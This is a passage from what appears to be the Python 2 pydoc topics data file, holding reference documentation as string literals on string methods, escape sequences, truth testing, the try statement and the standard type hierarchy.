'www.example.com'.strip('cmowz.')\n" " 'example'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* ' 'argument.\n' '\n' 'str.swapcase()\n' '\n' ' Return a copy of the string with uppercase characters ' 'converted to\n' ' lowercase and vice versa.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.title()\n' '\n' ' Return a titlecased version of the string where words ' 'start with an\n' ' uppercase character and the remaining characters are ' 'lowercase.\n' '\n' ' The algorithm uses a simple language-independent ' 'definition of a\n' ' word as groups of consecutive letters. The definition ' 'works in\n' ' many contexts but it means that apostrophes in ' 'contractions and\n' ' possessives form word boundaries, which may not be the ' 'desired\n' ' result:\n' '\n' ' >>> "they\'re bill\'s friends from the UK".title()\n' ' "They\'Re Bill\'S Friends From The Uk"\n' '\n' ' A workaround for apostrophes can be constructed using ' 'regular\n' ' expressions:\n' '\n' ' >>> import re\n' ' >>> def titlecase(s):\n' ' ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n' ' ... lambda mo: ' 'mo.group(0)[0].upper() +\n' ' ... ' 'mo.group(0)[1:].lower(),\n' ' ... s)\n' ' ...\n' ' >>> titlecase("they\'re bill\'s friends.")\n' ' "They\'re Bill\'s Friends."\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.translate(table[, deletechars])\n' '\n' ' Return a copy of the string where all characters ' 'occurring in the\n' ' optional argument *deletechars* are removed, and the ' 'remaining\n' ' characters have been mapped through the given ' 'translation table,\n' ' which must be a string of length 256.\n' '\n' ' You can use the "maketrans()" helper function in the ' '"string"\n' ' module to create a translation table. For string ' 'objects, set the\n' ' *table* argument to "None" for translations that only ' 'delete\n' ' characters:\n' '\n' " >>> 'read this short text'.translate(None, 'aeiou')\n" " 'rd ths shrt txt'\n" '\n' ' New in version 2.6: Support for a "None" *table* ' 'argument.\n' '\n' ' For Unicode objects, the "translate()" method does not ' 'accept the\n' ' optional *deletechars* argument. Instead, it returns a ' 'copy of the\n' ' *s* where all characters have been mapped through the ' 'given\n' ' translation table which must be a mapping of Unicode ' 'ordinals to\n' ' Unicode ordinals, Unicode strings or "None". Unmapped ' 'characters\n' ' are left untouched. Characters mapped to "None" are ' 'deleted. Note,\n' ' a more flexible approach is to create a custom ' 'character mapping\n' ' codec using the "codecs" module (see "encodings.cp1251" ' 'for an\n' ' example).\n' '\n' 'str.upper()\n' '\n' ' Return a copy of the string with all the cased ' 'characters [4]\n' ' converted to uppercase. Note that ' '"str.upper().isupper()" might be\n' ' "False" if "s" contains uncased characters or if the ' 'Unicode\n' ' category of the resulting character(s) is not "Lu" ' '(Letter,\n' ' uppercase), but e.g. "Lt" (Letter, titlecase).\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.zfill(width)\n' '\n' ' Return the numeric string left filled with zeros in a ' 'string of\n' ' length *width*. A sign prefix is handled correctly. ' 'The original\n' ' string is returned if *width* is less than or equal to ' '"len(s)".\n' '\n' ' New in version 2.2.2.\n' '\n' 'The following methods are present only on unicode ' 'objects:\n' '\n' 'unicode.isnumeric()\n' '\n' ' Return "True" if there are only numeric characters in ' 'S, "False"\n' ' otherwise. Numeric characters include digit characters, ' 'and all\n' ' characters that have the Unicode numeric value ' 'property, e.g.\n' ' U+2155, VULGAR FRACTION ONE FIFTH.\n' '\n' 'unicode.isdecimal()\n' '\n' ' Return "True" if there are only decimal characters in ' 'S, "False"\n' ' otherwise. Decimal characters include digit characters, ' 'and all\n' ' characters that can be used to form decimal-radix ' 'numbers, e.g.\n' ' U+0660, ARABIC-INDIC DIGIT ZERO.\n', 'strings': '\n' 'String literals\n' '***************\n' '\n' 'String literals are described by the following lexical ' 'definitions:\n' '\n' ' stringliteral ::= [stringprefix](shortstring | longstring)\n' ' stringprefix ::= "r" | "u" | "ur" | "R" | "U" | "UR" | "Ur" ' '| "uR"\n' ' | "b" | "B" | "br" | "Br" | "bR" | "BR"\n' ' shortstring ::= "\'" shortstringitem* "\'" | \'"\' ' 'shortstringitem* \'"\'\n' ' longstring ::= "\'\'\'" longstringitem* "\'\'\'"\n' ' | \'"""\' longstringitem* \'"""\'\n' ' shortstringitem ::= shortstringchar | escapeseq\n' ' longstringitem ::= longstringchar | escapeseq\n' ' shortstringchar ::= <any source character except "\\" or ' 'newline or the quote>\n' ' longstringchar ::= <any source character except "\\">\n' ' escapeseq ::= "\\" <any ASCII character>\n' '\n' 'One syntactic restriction not indicated by these productions is ' 'that\n' 'whitespace is not allowed between the "stringprefix" and the rest ' 'of\n' 'the string literal. The source character set is defined by the\n' 'encoding declaration; it is ASCII if no encoding declaration is ' 'given\n' 'in the source file; see section Encoding declarations.\n' '\n' 'In plain English: String literals can be enclosed in matching ' 'single\n' 'quotes ("\'") or double quotes ("""). They can also be enclosed ' 'in\n' 'matching groups of three single or double quotes (these are ' 'generally\n' 'referred to as *triple-quoted strings*). The backslash ("\\")\n' 'character is used to escape characters that otherwise have a ' 'special\n' 'meaning, such as newline, backslash itself, or the quote ' 'character.\n' 'String literals may optionally be prefixed with a letter "\'r\'" ' 'or\n' '"\'R\'"; such strings are called *raw strings* and use different ' 'rules\n' 'for interpreting backslash escape sequences. A prefix of "\'u\'" ' 'or\n' '"\'U\'" makes the string a Unicode string. Unicode strings use ' 'the\n' 'Unicode character set as defined by the Unicode Consortium and ' 'ISO\n' '10646. Some additional escape sequences, described below, are\n' 'available in Unicode strings. A prefix of "\'b\'" or "\'B\'" is ' 'ignored in\n' 'Python 2; it indicates that the literal should become a bytes ' 'literal\n' 'in Python 3 (e.g. when code is automatically converted with ' '2to3). A\n' '"\'u\'" or "\'b\'" prefix may be followed by an "\'r\'" prefix.\n' '\n' 'In triple-quoted strings, unescaped newlines and quotes are ' 'allowed\n' '(and are retained), except that three unescaped quotes in a row\n' 'terminate the string. (A "quote" is the character used to open ' 'the\n' 'string, i.e. either "\'" or """.)\n' '\n' 'Unless an "\'r\'" or "\'R\'" prefix is present, escape sequences ' 'in\n' 'strings are interpreted according to rules similar to those used ' 'by\n' 'Standard C. The recognized escape sequences are:\n' '\n' '+-------------------+-----------------------------------+---------+\n' '| Escape Sequence | Meaning | Notes ' '|\n' '+===================+===================================+=========+\n' '| "\\newline" | Ignored ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\\\" | Backslash ("\\") ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\\'" | Single quote ("\'") ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\"" | Double quote (""") ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\a" | ASCII Bell (BEL) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\b" | ASCII Backspace (BS) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\f" | ASCII Formfeed (FF) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\n" | ASCII Linefeed (LF) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\N{name}" | Character named *name* in the ' '| |\n' '| | Unicode database (Unicode only) | ' '|\n' '+-------------------+-----------------------------------+---------+\n' '| "\\r" | ASCII Carriage Return (CR) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\t" | ASCII Horizontal Tab (TAB) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\uxxxx" | Character with 16-bit hex value | ' '(1) |\n' '| | *xxxx* (Unicode only) | ' '|\n' '+-------------------+-----------------------------------+---------+\n' '| "\\Uxxxxxxxx" | Character with 32-bit hex value | ' '(2) |\n' '| | *xxxxxxxx* (Unicode only) | ' '|\n' '+-------------------+-----------------------------------+---------+\n' '| "\\v" | ASCII Vertical Tab (VT) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\ooo" | Character with octal value *ooo* | ' '(3,5) |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\xhh" | Character with hex value *hh* | ' '(4,5) |\n' '+-------------------+-----------------------------------+---------+\n' '\n' 'Notes:\n' '\n' '1. Individual code units which form parts of a surrogate pair ' 'can\n' ' be encoded using this escape sequence.\n' '\n' '2. Any Unicode character can be encoded this way, but characters\n' ' outside the Basic Multilingual Plane (BMP) will be encoded ' 'using a\n' ' surrogate pair if Python is compiled to use 16-bit code units ' '(the\n' ' default).\n' '\n' '3. As in Standard C, up to three octal digits are accepted.\n' '\n' '4. Unlike in Standard C, exactly two hex digits are required.\n' '\n' '5. In a string literal, hexadecimal and octal escapes denote the\n' ' byte with the given value; it is not necessary that the byte\n' ' encodes a character in the source character set. In a Unicode\n' ' literal, these escapes denote a Unicode character with the ' 'given\n' ' value.\n' '\n' 'Unlike Standard C, all unrecognized escape sequences are left in ' 'the\n' 'string unchanged, i.e., *the backslash is left in the string*. ' '(This\n' 'behavior is useful when debugging: if an escape sequence is ' 'mistyped,\n' 'the resulting output is more easily recognized as broken.) It is ' 'also\n' 'important to note that the escape sequences marked as "(Unicode ' 'only)"\n' 'in the table above fall into the category of unrecognized escapes ' 'for\n' 'non-Unicode string literals.\n' '\n' 'When an "\'r\'" or "\'R\'" prefix is present, a character ' 'following a\n' 'backslash is included in the string without change, and *all\n' 'backslashes are left in the string*. For example, the string ' 'literal\n' '"r"\\n"" consists of two characters: a backslash and a lowercase ' '"\'n\'".\n' 'String quotes can be escaped with a backslash, but the backslash\n' 'remains in the string; for example, "r"\\""" is a valid string ' 'literal\n' 'consisting of two characters: a backslash and a double quote; ' '"r"\\""\n' 'is not a valid string literal (even a raw string cannot end in an ' 'odd\n' 'number of backslashes). Specifically, *a raw string cannot end ' 'in a\n' 'single backslash* (since the backslash would escape the ' 'following\n' 'quote character). Note also that a single backslash followed by ' 'a\n' 'newline is interpreted as those two characters as part of the ' 'string,\n' '*not* as a line continuation.\n' '\n' 'When an "\'r\'" or "\'R\'" prefix is used in conjunction with a ' '"\'u\'" or\n' '"\'U\'" prefix, then the "\\uXXXX" and "\\UXXXXXXXX" escape ' 'sequences are\n' 'processed while *all other backslashes are left in the string*. ' 'For\n' 'example, the string literal "ur"\\u0062\\n"" consists of three ' 'Unicode\n' "characters: 'LATIN SMALL LETTER B', 'REVERSE SOLIDUS', and " "'LATIN\n" "SMALL LETTER N'. Backslashes can be escaped with a preceding\n" 'backslash; however, both remain in the string. As a result, ' '"\\uXXXX"\n' 'escape sequences are only recognized when there are an odd number ' 'of\n' 'backslashes.\n', 'subscriptions': '\n' 'Subscriptions\n' '*************\n' '\n' 'A subscription selects an item of a sequence (string, tuple ' 'or list)\n' 'or mapping (dictionary) object:\n' '\n' ' subscription ::= primary "[" expression_list "]"\n' '\n' 'The primary must evaluate to an object of a sequence or ' 'mapping type.\n' '\n' 'If the primary is a mapping, the expression list must ' 'evaluate to an\n' 'object whose value is one of the keys of the mapping, and ' 'the\n' 'subscription selects the value in the mapping that ' 'corresponds to that\n' 'key. (The expression list is a tuple except if it has ' 'exactly one\n' 'item.)\n' '\n' 'If the primary is a sequence, the expression (list) must ' 'evaluate to a\n' 'plain integer. If this value is negative, the length of ' 'the sequence\n' 'is added to it (so that, e.g., "x[-1]" selects the last ' 'item of "x".)\n' 'The resulting value must be a nonnegative integer less than ' 'the number\n' 'of items in the sequence, and the subscription selects the ' 'item whose\n' 'index is that value (counting from zero).\n' '\n' "A string's items are characters. A character is not a " 'separate data\n' 'type but a string of exactly one character.\n', 'truth': '\n' 'Truth Value Testing\n' '*******************\n' '\n' 'Any object can be tested for truth value, for use in an "if" or\n' '"while" condition or as operand of the Boolean operations below. ' 'The\n' 'following values are considered false:\n' '\n' '* "None"\n' '\n' '* "False"\n' '\n' '* zero of any numeric type, for example, "0", "0L", "0.0", "0j".\n' '\n' '* any empty sequence, for example, "\'\'", "()", "[]".\n' '\n' '* any empty mapping, for example, "{}".\n' '\n' '* instances of user-defined classes, if the class defines a\n' ' "__nonzero__()" or "__len__()" method, when that method returns ' 'the\n' ' integer zero or "bool" value "False". [1]\n' '\n' 'All other values are considered true --- so objects of many types ' 'are\n' 'always true.\n' '\n' 'Operations and built-in functions that have a Boolean result ' 'always\n' 'return "0" or "False" for false and "1" or "True" for true, unless\n' 'otherwise stated. (Important exception: the Boolean operations ' '"or"\n' 'and "and" always return one of their operands.)\n', 'try': '\n' 'The "try" statement\n' '*******************\n' '\n' 'The "try" statement specifies exception handlers and/or cleanup code\n' 'for a group of statements:\n' '\n' ' try_stmt ::= try1_stmt | try2_stmt\n' ' try1_stmt ::= "try" ":" suite\n' ' ("except" [expression [("as" | ",") identifier]] ":" ' 'suite)+\n' ' ["else" ":" suite]\n' ' ["finally" ":" suite]\n' ' try2_stmt ::= "try" ":" suite\n' ' "finally" ":" suite\n' '\n' 'Changed in version 2.5: In previous versions of Python,\n' '"try"..."except"..."finally" did not work. "try"..."except" had to ' 'be\n' 'nested in "try"..."finally".\n' '\n' 'The "except" clause(s) specify one or more exception handlers. When ' 'no\n' 'exception occurs in the "try" clause, no exception handler is\n' 'executed. When an exception occurs in the "try" suite, a search for ' 'an\n' 'exception handler is started. This search inspects the except ' 'clauses\n' 'in turn until one is found that matches the exception. An ' 'expression-\n' 'less except clause, if present, must be last; it matches any\n' 'exception. For an except clause with an expression, that expression\n' 'is evaluated, and the clause matches the exception if the resulting\n' 'object is "compatible" with the exception. An object is compatible\n' 'with an exception if it is the class or a base class of the ' 'exception\n' 'object, or a tuple containing an item compatible with the exception.\n' '\n' 'If no except clause matches the exception, the search for an ' 'exception\n' 'handler continues in the surrounding code and on the invocation ' 'stack.\n' '[1]\n' '\n' 'If the evaluation of an expression in the header of an except clause\n' 'raises an exception, the original search for a handler is canceled ' 'and\n' 'a search starts for the new exception in the surrounding code and on\n' 'the call stack (it is treated as if the entire "try" statement ' 'raised\n' 'the exception).\n' '\n' 'When a matching except clause is found, the exception is assigned to\n' 'the target specified in that except clause, if present, and the ' 'except\n' "clause's suite is executed. All except clauses must have an\n" 'executable block. When the end of this block is reached, execution\n' 'continues normally after the entire try statement. (This means that\n' 'if two nested handlers exist for the same exception, and the ' 'exception\n' 'occurs in the try clause of the inner handler, the outer handler ' 'will\n' 'not handle the exception.)\n' '\n' "Before an except clause's suite is executed, details about the\n" 'exception are assigned to three variables in the "sys" module:\n' '"sys.exc_type" receives the object identifying the exception;\n' '"sys.exc_value" receives the exception\'s parameter;\n' '"sys.exc_traceback" receives a traceback object (see section The\n' 'standard type hierarchy) identifying the point in the program where\n' 'the exception occurred. These details are also available through the\n' '"sys.exc_info()" function, which returns a tuple "(exc_type,\n' 'exc_value, exc_traceback)". Use of the corresponding variables is\n' 'deprecated in favor of this function, since their use is unsafe in a\n' 'threaded program. As of Python 1.5, the variables are restored to\n' 'their previous values (before the call) when returning from a ' 'function\n' 'that handled an exception.\n' '\n' 'The optional "else" clause is executed if and when control flows off\n' 'the end of the "try" clause. [2] Exceptions in the "else" clause are\n' 'not handled by the preceding "except" clauses.\n' '\n' 'If "finally" is present, it specifies a \'cleanup\' handler. The ' '"try"\n' 'clause is executed, including any "except" and "else" clauses. If ' 'an\n' 'exception occurs in any of the clauses and is not handled, the\n' 'exception is temporarily saved. The "finally" clause is executed. ' 'If\n' 'there is a saved exception, it is re-raised at the end of the\n' '"finally" clause. If the "finally" clause raises another exception ' 'or\n' 'executes a "return" or "break" statement, the saved exception is\n' 'discarded:\n' '\n' ' >>> def f():\n' ' ... try:\n' ' ... 1/0\n' ' ... finally:\n' ' ... return 42\n' ' ...\n' ' >>> f()\n' ' 42\n' '\n' 'The exception information is not available to the program during\n' 'execution of the "finally" clause.\n' '\n' 'When a "return", "break" or "continue" statement is executed in the\n' '"try" suite of a "try"..."finally" statement, the "finally" clause ' 'is\n' 'also executed \'on the way out.\' A "continue" statement is illegal ' 'in\n' 'the "finally" clause. (The reason is a problem with the current\n' 'implementation --- this restriction may be lifted in the future).\n' '\n' 'The return value of a function is determined by the last "return"\n' 'statement executed. Since the "finally" clause always executes, a\n' '"return" statement executed in the "finally" clause will always be ' 'the\n' 'last one executed:\n' '\n' ' >>> def foo():\n' ' ... try:\n' " ... return 'try'\n" ' ... finally:\n' " ... return 'finally'\n" ' ...\n' ' >>> foo()\n' " 'finally'\n" '\n' 'Additional information on exceptions can be found in section\n' 'Exceptions, and information on using the "raise" statement to ' 'generate\n' 'exceptions may be found in section The raise statement.\n', 'types': '\n' 'The standard type hierarchy\n' '***************************\n' '\n' 'Below is a list of the types that are built into Python. ' 'Extension\n' 'modules (written in C, Java, or other languages, depending on the\n' 'implementation) can define additional types. Future versions of\n' 'Python may add types to the type hierarchy (e.g., rational ' 'numbers,\n' 'efficiently stored arrays of integers, etc.).\n' '\n' 'Some of the type descriptions below contain a paragraph listing\n' "'special attributes.' These are attributes that provide access to " 'the\n' 'implementation and are not intended for general use. Their ' 'definition\n' 'may change in the future.\n' '\n' 'None\n' ' This type has a single value. There is a single object with ' 'this\n' ' value. This object is accessed through the built-in name "None". ' 'It\n' ' is used to signify the absence of a value in many situations, ' 'e.g.,\n' " it is returned from functions that don't explicitly return\n" ' anything. Its truth value is false.\n' '\n' 'NotImplemented\n' ' This type has a single value. There is a single object with ' 'this\n' ' value. This object is accessed through the built-in name\n' ' "NotImplemented". Numeric methods and rich comparison methods ' 'may\n' ' return this value if they do not implement the operation for ' 'the\n' ' operands provided. (The interpreter will then try the ' 'reflected\n' ' operation, or some other fallback, depending on the operator.) ' 'Its\n' ' truth value is true.\n' '\n' 'Ellipsis\n' ' This type has a single value. There is a single object with ' 'this\n' ' value. This object is accessed through the built-in name\n' ' "Ellipsis". It is used to indicate the presence of the "..." ' 'syntax\n' ' in a slice. Its truth value is true.\n' '\n' '"numbers.Number"\n' ' These are created by numeric literals and returned as results ' 'by\n' ' arithmetic operators and arithmetic built-in functions. ' 'Numeric\n' ' objects are immutable; once created their value never changes.\n' ' Python numbers are of course strongly related to mathematical\n' ' numbers, but subject to the limitations of numerical ' 'representation\n' ' in computers.\n' '\n' ' Python distinguishes between integers, floating point numbers, ' 'and\n' ' complex numbers:\n' '\n' ' "numbers.Integral"\n' ' These represent elements from the mathematical set of ' 'integers\n' ' (positive and negative).\n' '\n' ' There are three types of integers:\n' '\n' ' Plain integers\n' ' These represent numbers in the range -2147483648 through\n' ' 2147483647. (The range may be larger on machines with a\n' ' larger natural word size, but not smaller.) When the ' 'result\n' ' of an operation would fall outside this range, the result ' 'is\n' ' normally returned as a long integer (in some cases, the\n' ' exception "OverflowError" is raised instead). For the\n' ' purpose of shift and mask operations, integers are assumed ' 'to\n' " have a binary, 2's complement notation using 32 or more " 'bits,\n' ' and hiding no bits from the user (i.e., all 4294967296\n' ' different bit patterns correspond to different values).\n' '\n' ' Long integers\n' ' These represent numbers in an unlimited range, subject to\n' ' available (virtual) memory only. For the purpose of ' 'shift\n' ' and mask operations, a binary representation is assumed, ' 'and\n' " negative numbers are represented in a variant of 2's\n" ' complement which gives the illusion of an infinite string ' 'of\n' ' sign bits extending to the left.\n' '\n' ' Booleans\n' ' These represent the truth values False and True. The two\n' ' objects representing the values "False" and "True" are ' 'the\n' ' only Boolean objects. The Boolean type is a subtype of ' 'plain\n' ' integers, and Boolean values behave like the values 0 and ' '1,\n' ' respectively, in almost all contexts, the exception being\n' ' that when converted to a string, the strings ""False"" or\n' ' ""True"" are returned, respectively.\n' '\n' ' The rules for integer representation are intended to give ' 'the\n' ' most meaningful interpretation of shift and mask operations\n' ' involving negative integers and the least surprises when\n' ' switching between the plain and long integer domains. Any\n' ' operation, if it yields a result in the plain integer ' 'domain,\n' ' will yield the same result in the long integer domain or ' 'when\n' ' using mixed operands. The switch between domains is ' 'transparent\n' ' to the programmer.\n' '\n' ' "numbers.Real" ("float")\n' ' These represent machine-level double precision floating ' 'point\n' ' numbers. You are at the mercy of the underlying machine\n' ' architecture (and C or Java implementation) for the accepted\n' ' range and handling of overflow. Python does not support ' 'single-\n' ' precision floating point numbers; the savings in processor ' 'and\n' ' memory usage that are usually the reason for using these are\n' ' dwarfed by the overhead of using objects in Python, so there ' 'is\n' ' no reason to complicate the language with two kinds of ' 'floating\n' ' point numbers.\n' '\n' ' "numbers.Complex"\n' ' These represent complex numbers as a pair of machine-level\n' ' double precision floating point numbers. The same caveats ' 'apply\n' ' as for floating point numbers. The real and imaginary parts ' 'of a\n' ' complex number "z" can be retrieved through the read-only\n' ' attributes "z.real" and "z.imag".\n' '\n' 'Sequences\n' ' These represent finite ordered sets indexed by non-negative\n' ' numbers. The built-in function "len()" returns the number of ' 'items\n' ' of a sequence. When the length of a sequence is *n*, the index ' 'set\n' ' contains the numbers 0, 1, ..., *n*-1. Item *i* of sequence *a* ' 'is\n' ' selected by "a[i]".\n' '\n' ' Sequences also support slicing: "a[i:j]" selects all items with\n' ' index *k* such that *i* "<=" *k* "<" *j*. When used as an\n' ' expression, a slice is a sequence of the same type. This ' 'implies\n' ' that the index set is renumbered so that it starts at 0.\n' '\n' ' Some sequences also support "extended slicing" with a third ' '"step"\n' ' parameter: "a[i:j:k]" selects all items of *a* with index *x* ' 'where\n' ' "x = i + n*k", *n* ">=" "0" and *i* "<=" *x* "<" *j*.\n' '\n' ' Sequences are distinguished according to their mutability:\n' '\n' ' Immutable sequences\n' ' An object of an immutable sequence type cannot change once it ' 'is\n' ' created. (If the object contains references to other ' 'objects,\n' ' these other objects may be mutable and may be changed; ' 'however,\n' ' the collection of objects directly referenced by an ' 'immutable\n' ' object cannot change.)\n' '\n' ' The following types are immutable sequences:\n' '\n' ' Strings\n' ' The items of a string are characters. There is no ' 'separate\n' ' character type; a character is represented by a string of ' 'one\n' ' item. Characters represent (at least) 8-bit bytes. The\n' ' built-in functions "chr()" and "ord()" convert between\n' ' characters and nonnegative integers representing the byte\n' ' values. Bytes with the values 0-127 usually represent ' 'the\n' ' corresponding ASCII values, but the interpretation of ' 'values\n' ' is up to the program. The string data type is also used ' 'to\n' ' represent arrays of bytes, e.g., to hold data read from a\n' ' file.\n' '\n' ' (On systems whose native character set is not ASCII, ' 'strings\n' ' may use EBCDIC in their internal representation, provided ' 'the\n' ' functions "chr()" and "ord()" implement a mapping between\n' ' ASCII and EBCDIC, and string comparison preserves the ' 'ASCII\n' ' order. Or perhaps someone can propose a better rule?)\n' '\n' ' Unicode\n' ' The items of a Unicode object are Unicode code units. A\n' ' Unicode code unit is represented by a Unicode object of ' 'one\n' ' item and can hold either a 16-bit or 32-bit value\n' ' representing a Unicode ordinal (the maximum value for the\n' ' ordinal is given in "sys.maxunicode", and depends on how\n' ' Python is configured at compile time). Surrogate pairs ' 'may\n' ' be present in the Unicode object, and will be reported as ' 'two\n' ' separate items. The built-in functions "unichr()" and\n' ' "ord()" convert between code units and nonnegative ' 'integers\n' ' representing the Unicode ordinals as defined in the ' 'Unicode\n' ' Standard 3.0. Conversion from and to other encodings are\n' ' possible through the Unicode method "encode()" and the ' 'built-\n' ' in function "unicode()".\n' '\n' ' Tuples\n' ' The items of a tuple are arbitrary Python objects. Tuples ' 'of\n' ' two or more items are formed by comma-separated lists of\n' " expressions. A tuple of one item (a 'singleton') can be\n" ' formed by affixing a comma to an expression (an expression ' 'by\n' ' itself does not create a tuple, since parentheses must be\n' ' usable for grouping of expressions). An empty tuple can ' 'be\n' ' formed by an empty pair of parentheses.\n' '\n' ' Mutable sequences\n' ' Mutable sequences can be changed after they are created. ' 'The\n' ' subscription and slicing notations can be used as the target ' 'of\n' ' assignment and "del" (delete) statements.\n' '\n' ' There are currently two intrinsic mutable sequence types:\n' '\n' ' Lists\n' ' The items of a list are arbitrary Python objects. Lists ' 'are\n' ' formed by placing a comma-separated list of expressions ' 'in\n' ' square brackets. (Note that there are no special cases ' 'needed\n' ' to form lists of length 0 or 1.)\n' '\n' ' Byte Arrays\n' ' A bytearray object is a mutable array. They are created ' 'by\n' ' the built-in "bytearray()" constructor. Aside from being\n' ' mutable (and hence unhashable), byte arrays otherwise ' 'provide\n' ' the same interface and functionality as immutable bytes\n' ' objects.\n' '\n' ' The extension module "array" provides an additional example ' 'of a\n' ' mutable sequence type.\n' '\n' 'Set types\n' ' These represent unordered, finite sets of unique, immutable\n' ' objects. As such, they cannot be indexed by any subscript. ' 'However,\n' ' they can be iterated over, and the built-in function "len()"\n' ' returns the number of items in a set. Common uses for sets are ' 'fast\n' ' membership testing, removing duplicates from a sequence, and\n' ' computing mathematical operations such as intersection, union,\n' ' difference, and symmetric difference.\n' '\n' ' For set elements, the same immutability rules apply as for\n' ' dictionary keys. Note that numeric types obey the normal rules ' 'for\n' ' numeric comparison: if two numbers compare equal (e.g., "1" and\n' ' "1.0"), only one of them can be contained in a set.\n' '\n' ' There are currently two intrinsic set types:\n' '\n' ' Sets\n' ' These represent a mutable set. They are created by the ' 'built-in\n' ' "set()" constructor and can be modified afterwards by ' 'several\n' ' methods, such as "add()".\n' '\n' ' Frozen sets\n' ' These represent an immutable set. They are created by the\n' ' built-in "frozenset()" constructor. As a frozenset is ' 'immutable\n' ' and *hashable*, it can be used again as an element of ' 'another\n' ' set, or as a dictionary key.\n' '\n' 'Mappings\n' ' These represent finite sets of objects indexed by arbitrary ' 'index\n' ' sets. The subscript notation "a[k]" selects the item indexed by ' '"k"\n' ' from the mapping "a"; this can be used in expressions and as ' 'the\n' ' target of assignments or "del" statements. The built-in ' 'function\n' ' "len()" returns the number of items in a mapping.\n' '\n' ' There is currently a single intrinsic mapping type:\n' '\n' ' Dictionaries\n' ' These represent finite sets of objects indexed by nearly\n' ' arbitrary values. The only types of values not acceptable ' 'as\n' ' keys are values containing lists or dictionaries or other\n' ' mutable types that are compared by value rather than by ' 'object\n' ' identity, the reason being that the efficient implementation ' 'of\n' " dictionaries requires a key's hash value to remain constant.\n" ' Numeric types used for keys obey the normal rules for ' 'numeric\n' ' comparison: if two numbers compare equal (e.g., "1" and ' '"1.0")\n' ' then they can be used interchangeably to index the same\n' ' dictionary entry.\n' '\n' ' Dictionaries are mutable; they can be created by the "{...}"\n' ' notation (see section Dictionary displays).\n' '\n' ' The extension modules "dbm", "gdbm", and "bsddb" provide\n' ' additional examples of mapping types.\n' '\n' 'Callable types\n' ' These are the types to which the function call operation (see\n' ' section Calls) can be applied:\n' '\n' ' User-defined functions\n' ' A user-defined function object is created by a function\n' ' definition (see section Function definitions). It should be\n' ' called with an argument list containing the same number of ' 'items\n' " as the function's formal parameter list.\n" '\n' ' Special attributes:\n' '\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | Attribute | Meaning ' '| |\n' ' ' '+=========================+=================================+=============+\n' ' | "__doc__" "func_doc" | The function\'s documentation ' '| Writable |\n' ' | | string, or "None" if ' '| |\n' ' | | unavailable. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__name__" "func_name" | The function\'s name. ' '| Writable |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__module__" | The name of the module the | ' 'Writable |\n' ' | | function was defined in, or ' '| |\n' ' | | "None" if unavailable. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__defaults__" | A tuple containing default | ' 'Writable |\n' ' | "func_defaults" | argument values for those ' '| |\n' ' | | arguments that have defaults, ' '| |\n' ' | | or "None" if no arguments have ' '| |\n' ' | | a default value. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__code__" "func_code" | The code object representing | ' 'Writable |\n' ' | | the compiled function body. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__globals__" | A reference to the dictionary | ' 'Read-only |\n' ' | "func_globals" | that holds the function\'s ' '| |\n' ' | | global variables --- the global ' '| |\n' ' | | namespace of the module in ' '| |\n' ' | | which the function was defined. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__dict__" "func_dict" | The namespace supporting | ' 'Writable |\n' ' | | arbitrary function attributes. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__closure__" | "None" or a tuple of cells that | ' 'Read-only |\n' ' | "func_closure" | contain bindings for the ' '| |\n' " | | function's free variables. " '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' '\n' ' Most of the attributes labelled "Writable" check the type of ' 'the\n' ' assigned value.\n' '\n' ' Changed in version 2.4: "func_name" is now writable.\n' '\n' ' Changed in version 2.6: The double-underscore attributes\n' ' "__closure__", "__code__", "__defaults__", and "__globals__"\n' ' were introduced as aliases for the corresponding "func_*"\n' ' attributes for forwards compatibility with Python 3.\n' '\n' ' Function objects also support getting and setting arbitrary\n' ' attributes, which can be used, for example, to attach ' 'metadata\n' ' to functions. Regular attribute dot-notation is used to get ' 'and\n' ' set such attributes. *Note that the current implementation ' 'only\n' ' supports function attributes on user-defined functions. ' 'Function\n' ' attributes on built-in functions may be supported in the\n' ' future.*\n' '\n' " Additional information about a function's definition can be\n" ' retrieved from its code object; see the description of ' 'internal\n' ' types below.\n' '\n' ' User-defined methods\n' ' A user-defined method object combines a class, a class ' 'instance\n' ' (or "None") and any callable object (normally a user-defined\n' ' function).\n' '\n' ' Special read-only attributes: "im_self" is the class ' 'instance\n' ' object, "im_func" is the function object; "im_class" is the\n' ' class of "im_self" for bound methods or the class that asked ' 'for\n' ' the method for unbound methods; "__doc__" is the method\'s\n' ' documentation (same as "im_func.__doc__"); "__name__" is the\n' ' method name (same as "im_func.__name__"); "__module__" is ' 'the\n' ' name of the module the method was defined in, or "None" if\n' ' unavailable.\n' '\n' ' Changed in version 2.2: "im_self" used to refer to the class\n' ' that defined the method.\n' '\n' ' Changed in version 2.6: For Python 3 forward-compatibility,\n' ' "im_func" is also available as "__func__", and "im_self" as\n' ' "__self__".\n' '\n' ' Methods also support accessing (but not setting) the ' 'arbitrary\n' ' function attributes on the underlying function object.\n' '\n' ' User-defined method objects may be created when getting an\n' ' attribute of a class (perhaps via an instance of that class), ' 'if\n' ' that 